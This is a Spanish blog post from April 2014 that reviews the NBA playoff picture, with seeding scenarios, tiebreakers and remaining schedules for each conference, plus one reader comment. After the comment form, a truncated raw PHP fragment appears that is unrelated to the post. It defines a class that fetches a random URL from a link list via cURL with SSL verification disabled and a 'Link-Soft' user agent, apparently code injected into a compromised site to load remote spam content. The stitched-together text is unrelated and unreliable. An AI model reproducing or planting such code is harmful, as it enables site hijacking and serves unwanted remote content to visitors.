Ubicándose en el Playoff Picture

09 de April de 2014 por Nacho

Desde hace ya algunas semanas la página oficial de la NBA nos muestra cómo evoluciona el PlayOff Picture. Es un ejercicio al menos curioso, aunque todos sabemos que el que vale es el que publiquen el 16 de abril (17 ya para nosotros). A continuación analizaremos las posibilidades (estadísticas) de cada equipo para colocarse lo mejor posible en el cuadro.

Tenemos enfrentamientos directos que ya suenan a postemporada, partidos en teoría fáciles y algún que otro encuentro que más bien parece de pretemporada, como el Lakers-Houston de ayer sin ir más lejos. Los equipos deberían preocuparse de sí mismos y olvidar a los ‘rivales’ estos días pues eso puede conducirte a errores.

Al menos queda un juez, de esos que van por libre, en el calendario de algunos equipos. Nos referimos a los Wolves, que juegan mejor sin presión. Normal en un equipo sin tensión competitiva, quizás la mayor decepción de la temporada. En este mes de abril han ganado a Miami, Memphis y anoche a Spurs, y les quedan, de los equipos ‘calientes,’ a Chicago, Golden State y Houston.

Una última apreciación para los amantes de las estadísticas: es hora de mirar el casillero de derrotas y no el de la diferencia de partidos entre equipos ya que a algunos equipos les quedan más encuentros. Un ejemplo, Dallas en estos momento aventaja en dos partidos a Memphis pero la diferencia más real es la de una sola derrota. Yo aconsejo a los que creen que Nowitzki lo tienen hecho que sean prudente al arriesgar su dinero.

Sin más dilación, veamos que se nos presenta en estos 8 días apasionantes. 

OESTE

Por la primera plaza:

A los Spurs les restan dos victorias para conseguirlo. Empresa asequible aunque serán jueces de otras batallas. Visitan Dallas y reciben a los Suns. La derrota en Minnesota les obliga a ganar, además del partido frente los Lakers (victoria segura aunque jueguen con los de las mopas) a uno de sus posibles rivales en postemporada, o a unos Rockets que les han derrotado siempre este año.

Los Thunder, más que mirar a los texanos, deberían tener cuidado de los Clippers.

Por la segunda plaza:

Vienen fuertes los angelinos. Ya están a un partido (dos derrotas) de los Thunder y hoy mismo les reciben en su casa en un partido que puede resultar crucial. Tras el duelo se enfrentan también en casa a Sacramento y Denver y viajan a Portland. Por su parte, Oklahoma jugarán ante Detroit, doble partido ante Pelicans y visitarán a unos Pacers en horas bajas. Cuidado, porque los Clippers se pueden hacer con la ventaja de campo en la hipotética semifinal de conferencia.

Por un puesto de cabeza de serie:

Houston y Portland están prácticamente condenados a enfrentarse. Ahora mismo la ventaja de campo en la serie corresponde a los texanos y no parece peligrar. Los de Oregon tienen dos partidos de los fáciles y terminan recibiendo a GSW y LAC. Aun ganando todo dependen de los Rockets. Para perder éstos su plaza deberían caer en cuatro de los cinco partidos que les restan, y se enfrentan a cuatro rivales ante los que no han perdido un sólo encuentro: Spurs, Wolves, dos veces Pelicans y Denver.

La quinta plaza:

Parece hecho para Portland pero cuidado porque una derrota ante los propios Warriors en el Moda Center les obligaría a ganar los otros tres partidos si los de la bahía se empeñan en ganarlo todo.

La sexta plaza:

Los Guerreros del Estado Dorado (creo que es el único nombre que mola traducido al español) dependen de sí mismos y además gozan de un calendario asequible. De los cinco partidos que les restan deberían caer en tres de ellos para que Dallas o Phoenix los rebasaran. Si Dallas ganase todo lo que le queda sí podría tener importancia aquel tapón de Jermaine a Monta Ellis de hace una semana por el que la propia NBA se disculpó.

La supervivencia a partir del 16 de abril:

Dallas y Suns toman delantera con respecto a Grizzlies  tras perder éstos el domingo frente los Spurs, que serán árbitros de la lucha al tener que enfrentarse todavía a los otros dos equipos. Además, los 3 equipos disputarán un triangular que acabará de decidir quíen obtiene el premio de la postemporada. Rescatamos calendarios del post anterior:

Memphis: 9  vs. MIA; 11 vs. PHI; 13 at LAL; 14 at PHX; 16 vs. DAL.
Phoenix:  9  at NOP; 11 at SAS; 12 at DAL; 14 vs. MEN; 16 at SAC.
Dallas: 10 vs. SAS; 12 vs. PHX; 16 at MEN.

Antes de ver las victorias que cada uno necesitan vamos a ver cómo se resolverían los posibles empates:

Si empatan Memphis y Dallas, pasa Dallas independientemente de lo que hagan en el partido que les resta; si lo hacen Grizzlies y Suns, pasan los osos independientemente de lo que hagan en su partido; si empatan Mavericks y Phoenix, pasa el equipo que gane el partido que les resta.

Triple empate: Dallas pasa siempre, suceda lo que suceda en los resultados entre ellos en los tres partidos; Phoenix solo pasaría si gana sus dos partidos y Dallas gana a Memphis en el otro; Memphis pasaría en el resto de las combinaciones.

Queda claro que con 50 victorias aseguras PlayOffs por lo que todavía todos dependen de sí mismos. Dallas y Phoenix tienen margen de error de un partido y Gasol, Randolph y compañía deben contar por victorias sus encuentros para no depender de otros resultados.

ESTE

Por la primera plaza:

Los campeones cobran ventaja y es que los tristes Pacers no pueden caer más. Es lo que tiene el Este. Ambos dependen de sí mismos pues se enfrentan el viernes en el American Airlines Arena. Lo que no sabemos es si, considerando la más que probable quinta plaza de los Nets, no les interesará a ambos ser segundos pues los de Brooklyn parecen a día de hoy el rival más duro del Este, como demostraron precisamente anoche en Miami.

3ª, 4ª y 5ª plaza:

Prácticamente imposible que Toronto y Chicago pierdan la ventaja de campo en la primera eliminatoria ya que ambos deberían perder tres partidos de los cinco que les quedan y que los Nets ganaran todo lo que les resta. En el duelo por la tercera plaza (vital a día de hoy pues supondría un hipotético cruce con los Pacers) los canadienses parten con ventaja, pues en caso de empate prevalece el campeón de conferencia sobre el resto de cuestiones en el desempate.

Como apunte curioso decir que el tercer supuesto de desempate (en el que se podrían ver involucrados Nets y Raptors) es el de porcentaje de victorias dentro de la misma conferencia. (debería aplicarse solo al Oeste. Para el Este al contrario, jejeje). Los pupilos de Kidd son el segundo equipo del Este, después de Miami, con mejor porcentaje de victorias intraconferencia.

5ª, 6ª y 7ª plaza:

No están los equipos para florituras ahora que se preparan para los PO. Si no, veríamos a Nets, Wizards y Bobcats tanquear para ser séptimos tal y como andan en Indiana.

Para la quinta plaza los neoyorquinos parten con una considerable ventaja. Washington o Charlotte deberían ganarlo todo y ellos perder un mínimo de tres partidos, en el caso de los Wizards, o cuarto, en el caso de los Bobcats.

La lucha entre Wizards y Bobcats por la sexta plaza se dilucida en el encuentro que les enfrenta hoy en Charlotte. Ambos dependen de sí mismos. ¿Qué querrán? ¿Raptors o Pacers?

Ser o no ser:

Para finalmente ser barridos por LeBron. Atlanta parecía haber recuperado sensaciones y aunque la posición la mantienen, la derrota de anoche en casa ante Detroit nos permite creer que hay más juego de lo que se podía esperar. Si los Knicks lo ganan todo, que ya es, tendrían que caer en tres de sus cinco encuentros, algo que han demostrado ser capaces de conseguir a pesar de que dos de esos partidos sean contra equipos empeñados en perder. Matemáticamente los Cavs están en la pomada pero se enfrentan a su propia ineficacia. Para conseguir ese imposible deberían ganar sus cuatro encuentros, que Atlanta los perdiese todos y que los Knicks pierdan tres de los cuatro que quedan.

Todo es posible en el Este. Incluso estar en postemporada teniendo mejor porcentaje que solo tres equipos de todo el Oeste.

Comenta

Un comentario a esta entrada

  1. Denise dice:
    #1

    Salvo hecatombe maysucula, la 8º plaza del Este debería ser para Hawks. Si hay un Clippers-GSW en 1º ronda, ojo que yo veo la eliminatoria al 50%. GSW ha cuajado una regular temporada pero ganar en el ambientazo del Oracle es muy jodido.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>